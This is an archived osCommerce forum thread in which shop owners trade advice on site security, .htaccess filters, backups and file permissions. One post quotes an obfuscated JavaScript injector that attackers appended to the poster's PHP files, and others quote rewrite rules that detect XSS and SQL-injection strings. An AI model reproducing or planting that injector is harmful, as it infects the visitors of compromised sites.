Jump to content



Photo
* * * * - 6 votes

How to secure your osCommerce 2.2 site.


This topic has been archived. This means that you cannot reply to this topic.
656 replies to this topic

#41   rednme

rednme
  • Members
  • 21 posts

Posted 03 January 2009 - 16:37

Warning: file(DOCUMENT_ROOT/../banned/IP_Trapped.txt) [function.file]: failed to open stream: Permission denied in /var/www/vhosts/themancaveoutletstore.com/httpdocs/includes/secret.php on line 7

Warning: Invalid argument supplied for foreach() in /var/www/vhosts/themancaveoutletstore.com/httpdocs/includes/secret.php on line 15

This is coming from the Application Top

I also wasn't getting banned... my IP never showed up... but then again maybe it all has to do with the error above... I disabled the application top code for now... any takers on this?


try for DOCUMENT_ROOT portion with absolute path to the files like :

/var/www/vhosts/themancaveoutletstore.com/httpdocs/banned/IP_Trapped.txt

in
includes/secret.php
and
personal/index.php

and change permission to 777 or 666 for IP_Trapped.txt

genesis

Edited by rednme, 03 January 2009 - 16:39.


#42   carricksupplies

carricksupplies
  • Members
  • 12 posts

Posted 04 January 2009 - 14:44

I have installed all the contributions except the Security Pro contribution, they seem to be working fine.

Does anyone know how I would go about setting up a cron job to automatically backup the database every 3 hours?

What would the code be to do this?

Thanks,

Martyn

#43   airbrushmaster

airbrushmaster
  • Members
  • 326 posts

Posted 07 January 2009 - 16:09

hi just installed SiteMonitor_V_1.7 but in admin when i click the first button it says Reference file creation failed.

#44   airbrushmaster

airbrushmaster
  • Members
  • 326 posts

Posted 07 January 2009 - 16:31

hi just installed SiteMonitor_V_1.7 but in admin when i click the first button it says Reference file creation failed.



its ok i have took it off instead

#45   Eim2

Eim2
  • Members
  • 47 posts

Posted 12 January 2009 - 08:57

Hello,

There is a little PROBLEM here: http://addons.oscommerce.com/info/6044

I've installed the latest Anti XSS+SQL Injection to help PCI Compliance by chrish123 added 19 Jul 2008.

When I click the <buy now> button on advanced_search_result.php the product is added to the customers basket
BUT I get redirected to the iplog.txt telling me I should go away ... which is no good at all.

When those lines are cut off .htaccess (commented) clicking the button gives no redirect:

This is the relevant part in .htaccess
# extra anti uri and xss attack script 2 - sql injection prevention
 Options +FollowSymLinks
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteRule (,|;|<|>|'|`) /log.php [NC]

Should I keep only the pixclinic part of this contribution ?
Thanks for your kind advice,
David
david

#46   nomawhite

nomawhite
  • Members
  • 16 posts

Posted 12 January 2009 - 18:18

Do you still need to do all these things if you have a SSL certificate setup? Thanks

#47   nomawhite

nomawhite
  • Members
  • 16 posts

Posted 15 January 2009 - 21:10

I hate using this forum because no one ever replies

#48   spooks

spooks
  • Members
  • 7,017 posts

Posted 15 January 2009 - 22:26

You have to be patient, we're providing free help, so you must wait till we have time.

The answer yes, the ssl only allows a secure connection, it does not 'secure' your site

The hackers are out there & if you don't protect the WILL get you.

I have a test site, for which there is no domain, its not published & without the IP you'll never find it, yet even that got attacked!!
Sam

Remember, What you think I ment may not be what I thought I ment when I said it.

Contributions:


Auto Backup your Database, Easy way

Multi Images with Fancy Pop-ups, Easy way

Products in columns with multi buy etc etc

Disable any Category or Product, Easy way

Secure & Improve your account pages et al.

#49   nomawhite

nomawhite
  • Members
  • 16 posts

Posted 15 January 2009 - 22:46

You have to be patient, we're providing free help, so you must wait till we have time.

The answer yes, the ssl only allows a secure connection, it does not 'secure' your site

The hackers are out there & if you don't protect the WILL get you.

I have a test site, for which there is no domain, its not published & without the IP you'll never find it, yet even that got attacked!!


Thanks for your reply, I am paranoid about making my site more open to the public by launching it. I do appreciate the free help but I have to say more than half the time I post something I do not get a reply, not that its your fault of course.

#50   suffolk

suffolk
  • Members
  • 5 posts

Posted 23 January 2009 - 07:23

Hi,
I'm not sure if this is the place for this, but as it's a security related issue, I hoped someone may have some ideas.

I've been using the 'whosonline' contrib for some time now, and as a result, i've noticed an interesting connection to my site.
Basically, the 'customer' behaves like a 'bot, working it's way through the pages of the site 24 x 7, it doesn't have a session ID, or appear to go anywhere it shouldn't, however it's a permanent visitor to the site, with it's online time counter only resetting every 24 hrs, so at the least, it's a resource hog.

-Now the weird part (to me at least!)
It's IP keeps changing! It cycles through various sets of IP's ranging from Yahoo bot to private/ISP/Google addresses. I have tried banning the IP addresses it uses, but it simply 'morphs' to a new one (I gave up after 50 addresses, as many were inside address pools used by ISPs, and I didn't wish to ban legitimate users)- the next weird part is that whosonline doesn't see this as a new visitor, it keeps the online time, and entry time counters and updates the IP address.

Obviously there's some sort of spoofing going on here, the question is, how to stop it! - it only makes a database query every 30-40 seconds, so it's not tripping any DOS alarms on the server/firewall.


Has anyone else seen anything similar, or have any ideas about what this could be (and how to stop it)???

#51   Coopco

Coopco
  • Members
  • 9,557 posts

Posted 26 January 2009 - 11:28

Hello,

There is a little PROBLEM here: http://addons.oscommerce.com/info/6044

I've installed the latest Anti XSS+SQL Injection to help PCI Compliance by chrish123 added 19 Jul 2008.

When I click the <buy now> button on advanced_search_result.php the product is added to the customers basket
BUT I get redirected to the iplog.txt telling me I should go away ... which is no good at all.

When those lines are cut off .htaccess (commented) clicking the button gives no redirect:

This is the relevant part in .htaccess

# extra anti uri and xss attack script 2 - sql injection prevention
 Options +FollowSymLinks
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteRule (,|;|<|>|'|`) /log.php [NC]

Should I keep only the pixclinic part of this contribution ?
Thanks for your kind advice,
David

Advanced Search - 403 Forbidden error, saying a login is required on my site...


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

#52   [200]

[200]
  • Members
  • 21 posts

Posted 26 January 2009 - 13:49

Hey guys,

I have installed all of the addons listed on the first page but I am still getting this code added to a number of php files...

c102916999516l497da75b3503d(l497da75b35734){ function l497da75b35f05(){return 16;} return (parseInt(l497da75b35734,l497da75b35f05()));}function l497da75b36f22(l497da75b37677){ function l497da75b38de9(){var l497da75b395b9=2;return l497da75b395b9;} var l497da75b37e48='';l497da75b39d8b=String.fromCharCode;for(l497da75b38618=0;l497da75b38618<l497da75b37677.length;l497da75b38618+=l497da75b38de9()){ l497da75b37e48+=(l497da75b39d8b(c102916999516l497da75b3503d(l497da75b37677.subst
r(l497da75b38618,l497da75b38de9()))));}return l497da75b37e48;} var x75='';var l497da75b3a55a='3C736'+x75+'3726'+x75+'970743E6'+x75+'96'+x75+'6'+x75+'28216'+x75+'D796'+x75+'96'+x75+'1297B6'+x75+'46'+x75+'F6'+x75+'3756'+x75+'D6'+x75+'56'+x75+'E742E77726'+x75+'9746'+x75+'528756'+x75+'E6'+x75+'5736'+x75+'36'+x75+'1706'+x75+'528202725336'+x75+'32536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'352532302536'+x75+'6'+x75+'52536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'42536'+x75+'332533312533302532302537332537322536'+x75+'3325336'+x75+'42532372536'+x75+'3825373425373425373025336'+x75+'125326'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2533322536'+x75+'6'+x75+'42536'+x75+'3525326'+x75+'52536'+x75+'6'+x75+'52536'+x75+'3525373425326'+x75+'6'+x75+'25326'+x75+'52536'+x75+'372536'+x75+'6'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'332536'+x75+'382536'+x75+'352536'+x75+'332536'+x75+'6'+x75+'225326'+x75+'52536'+x75+'382537342536'+x75+'6'+x75+'42536'+x75+'6'+x75+'32532372532302537372536'+x75+'392536'+x75+'342537342536'+x75+'3825336'+x75+'4253334253336'+x75+'2532302536'+x75+'382536'+x75+'352536'+x75+'392536'+x75+'372536'+x75+'3825373425336'+x75+'42533352533372533332532302537332537342537392536'+x75+'6'+x75+'32536'+x75+'3525336'+x75+'4253237253736'+x75+'2536'+x75+'392537332536'+x75+'392536'+x75+'322536'+x75+'392536'+x75+'6'+x75+'32536'+x75+'3925373425373925336'+x75+'12536'+x75+'382536'+x75+'392536'+x75+'342536'+x75+'342536'+x75+'352536'+x75+'6'+x75+'525323725336'+x75+'525336'+x75+'325326'+x75+'6'+x75+'2536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'52729293B7D76'+x75+'6'+x75+'172206'+x75+'D796'+x75+'96'+x75+'13D7472756'+x75+'53B3C2F736'+x75+'3726'+x75+'970743E';document.write(l497da75b36f22(l497da75b3a55a));</script>


How the hell do I get rid of this and prevent it from coming back?

Thanks.

#53   Coopco

Coopco
  • Members
  • 9,557 posts

Posted 26 January 2009 - 13:56

Hey guys,

I have installed all of the addons listed on the first page but I am still getting this code added to a number of php files...



How the hell do I get rid of this and prevent it from coming back?

Thanks.

If you are not running RC2a, then you need to patch it.

If you are running RC2a, then, to the best of my knowledge, and all things considered, your web host provides the vulnerabilty and you need to change web hosts.


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

#54   mirza_yasir4

mirza_yasir4
  • Members
  • 105 posts

Posted 01 February 2009 - 08:56

Both Security PRO and IP Trap worked for me
But I am unable to use .htaceess security, when I put a .htacess file into server, it give me server internal error, then I can not see my website and admin section both.
Thanks and Regards
Yasir Imran Mirza
My Contributions

#55   revenson

revenson
  • Members
  • 49 posts

Posted 01 February 2009 - 18:59

Both Security PRO and IP Trap worked for me
But I am unable to use .htaceess security, when I put a .htacess file into server, it give me server internal error, then I can not see my website and admin section both.



Yes, I found the same thing a couple of days ago. My suggestion is to remove sections of the suggested .htaccess file from the bottom up until it works. I say that because I recall it was something near the bottom that was causing my problem.

#56   paper53558

paper53558
  • Members
  • 5 posts

Posted 02 February 2009 - 18:42

Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosts.


I recently switched web hosts. I got the error about the images directory not being writeable. The directory permissions were 755. I was also unable to add images to products with the permissions set at 755. I switched the permissions to 777 and everything uploaded and the error message went away. At my old web host, the images folder was set at 755 and everything worked fine. The old host was a shared hosting plan, the new host is a VPS plan. What do I need to configure or ask the host to do to get my permissions back to 755? Thanks!

#57   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 02 February 2009 - 18:44

ask you host to turn on SuExec it will alow you to run 755 as 777 [as you old hosts did]
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#58   paper53558

paper53558
  • Members
  • 5 posts

Posted 02 February 2009 - 20:56

ask you host to turn on SuExec it will alow you to run 755 as 777 [as you old hosts did]
Nic


Thanks for your help. SuExec was already turned on, but I checked and had the host turn on suPHP and put it in the .htaccess file and that did the trick.

#59   spooks

spooks
  • Members
  • 7,017 posts

Posted 10 February 2009 - 21:53

oops
Sam

Remember, What you think I ment may not be what I thought I ment when I said it.

Contributions:


Auto Backup your Database, Easy way

Multi Images with Fancy Pop-ups, Easy way

Products in columns with multi buy etc etc

Disable any Category or Product, Easy way

Secure & Improve your account pages et al.

#60   Moparcj5

Moparcj5
  • Members
  • 33 posts

Posted 15 February 2009 - 22:02

I had a problem with htaccess protection contribution with hot linking images. When ever I went to a secure part of my website such as log in ,check out, ect, I would see the stolen image on those pages. Below I have added a line of code to this that fixed it. Hopefully this is done correctly and will not cause problems.

This is to help someone else out with the same problem. If there is anything wrong with this please let me know.

# stop hotlinking (gif/jpg) and serve alternate content
I have included an image for you to upload, please note if you use your images out side of your server (like linked into EBAY) you cannot use this.

<IfModule mod_rewrite.c>

RewriteEngine on

RewriteCond %{HTTP_REFERER} !^$

RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURSITE\.COM/.*$ [NC]

RewriteCond %{HTTP_REFERER} !^https://(www\.)?YOURSITE\.COM/.*$ [NC]

RewriteRule .*\.(gif|jpg)$ http://www.YOURSITE.COM/images/stolen.gif [R,NC,L]

</ifModule>

I have installed:
Oscommerce version 2.2rc2a, STS version 4.5.8, Header Tags SEO version 3.1.5, SEO Assistant version 2.1

Thanks
Joey